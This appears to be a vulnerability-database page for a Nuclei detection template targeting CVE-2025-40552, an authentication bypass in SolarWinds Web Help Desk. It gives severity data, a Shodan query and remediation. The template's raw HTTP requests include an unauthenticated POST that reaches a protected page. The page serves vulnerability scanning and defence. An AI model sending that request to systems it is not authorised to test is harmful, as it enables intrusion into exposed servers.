
SolarWinds Web Help Desk - Authentication Bypass

CVE-2025-40552
Verified

Description

SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control that lets attackers execute protected actions without authentication; exploitation requires no special conditions.

Severity

Critical

CVSS Score

9.8

Exploit Probability

9%

Affected Product

web_help_desk

Published Date

February 26, 2026

Template Author

watchtowr, dhiyaneshdk

CVE-2025-40552.yaml
id: CVE-2025-40552

info:
  name: SolarWinds Web Help Desk - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    SolarWinds Web Help Desk contains an authentication bypass vulnerability caused by improper access control, letting attackers execute protected actions without authentication, exploit requires no special conditions.
  impact: |
    Attackers can execute protected actions without authentication, potentially compromising system integrity and data security.
  remediation: Update to the latest version of SolarWinds Web Help Desk.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
    - https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552
    - https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
    - https://nvd.nist.gov/vuln/detail/CVE-2025-40552
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-40552
    cwe-id: CWE-1390
    epss-score: 0.08551
    epss-percentile: 0.9249
  metadata:
    verified: true
    max-request: 2
    vendor: solarwinds
    product: web_help_desk
    shodan-query: http.favicon.hash:"1895809524"
  tags: cve,cve2025,solarwinds,web-help-desk,auth-bypass

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, 'helpdesk','WebObjects')"
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        POST /helpdesk/WebObjects/Helpdesk.woa/wo/1.2 HTTP/1.1
        Host: {{Hostname}}

        wopage=LookAndFeelPref

    matchers:
      - type: dsl
        dsl:
          - "contains_all(body, '<span>Add File</span>','saveOptions')"
          - "status_code == 200"
        condition: and
# digest: 4b0a0048304602210081f7f4659cfd6ffdc7748da8ad653d8cc9e6f4a11175d530e3d8a21fbbd179ac022100d06368c701a73828d18db0319da50404454155fdf36fbbda22315b53b81ba5e2:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-40552
CWE ID: CWE-1390

References

https://github.com/watchtowrlabs/watchTowr-vs-SolarWinds-WebHelpDesk-CVE-2025-40552-CVE-2025-40553
https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40552
https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
https://nvd.nist.gov/vuln/detail/CVE-2025-40552

Remediation Steps

Update to the latest version of SolarWinds Web Help Desk.